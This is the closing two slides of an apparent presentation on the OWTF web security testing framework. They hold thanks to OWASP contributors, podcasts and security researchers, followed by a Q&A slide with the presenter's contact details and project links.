  • 109. Special thanks toOWASP Testing Guide contributorsFinux Tech Weekly – Episode 17 – mins 31-49http://www.finux.co.uk/episodes/mp3/FTW-EP17.mp3Finux Tech Weekly – Episode 12 – mins 33-38http://www.finux.co.uk/episodes/mp3/FTW-EP12.mp3Exotic Liability – Episode 83 – mins 49-53http://exoticliability.libsyn.com/exotic-liability-83-oh-yeahEurotrash 32: http://www.eurotrashsecurity.eu/index.php/Episode_32Adi Mutu (@an_animal), Andrés Riancho (@w3af), BharadwajMachiraju, Gareth Heyes (@garethheyes), Krzysztof Kotowicz(@kkotowicz), Marc Wickenden (@marcwickenden), Marcus Niemietz(@mniemietz), Mario Heiderich (@0x6D6172696F), Michael Kohl(@citizen428), Nicolas Grégoire (@Agarri_FR), Sandro Gauci(@sandrogauci)
  • 110. Q&AAbraham Aranguren@7a_ @owtfpabraham.aranguren@owasp.orghttp://7-a.orghttp://owtf.orgProject Site (links to everything): http://owtf.org• Try OWTF: https://github.com/7a/owtf_releases• Try a demo report: https://github.com/7a/owtf_demos• Documentation: https://github.com/7a/owtf/wiki• Contribute/Download: https://github.com/7a/owtf

×